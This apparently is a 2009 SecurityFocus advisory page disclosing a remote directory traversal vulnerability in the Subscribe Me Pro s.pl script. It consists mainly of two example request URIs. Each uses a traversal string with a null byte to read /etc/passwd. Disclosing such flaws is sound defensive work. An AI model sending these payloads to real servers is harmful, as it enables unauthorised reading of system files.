Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability

An exploit is not required.

The following example URI have been provided:

http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00







 

Privacy Statement
Copyright 2009, SecurityFocus